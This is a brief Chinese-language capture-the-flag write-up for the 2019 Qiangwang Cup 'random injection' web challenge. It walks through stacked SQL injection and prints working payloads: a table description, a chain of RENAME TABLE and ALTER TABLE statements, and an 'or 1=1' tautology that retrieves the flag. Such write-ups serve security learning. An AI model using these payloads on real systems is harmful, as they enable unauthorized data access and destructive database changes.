[强网杯 2019]随便注(17/100) 2021-1-17 13:40 | 584 | 0 | WEB 152 字 | 1 分钟内 解题 进来尝试sql注入,发现可以把表里的内容都查出来 尝试联合注入,发现过滤了很多东西 尝试堆叠注入,得到2个表 查看表结构,可以看到flag字段,数据库中纯数字名需要用反引号括起来 1';desc1919810931114514;# 1';desc words;# 到这就不知怎么进行查询了,看wp才知道是把2个表的名字交换,并且把flag字段的名字改成id 构造payload: 1';RENAME TABLE words TO aaaa;RENAME TABLE `1919810931114514` TO words;ALTER TABLE words CHANGE flag id varchar(100);# 然后输入1‘ or 1=1#,获得flag sql注入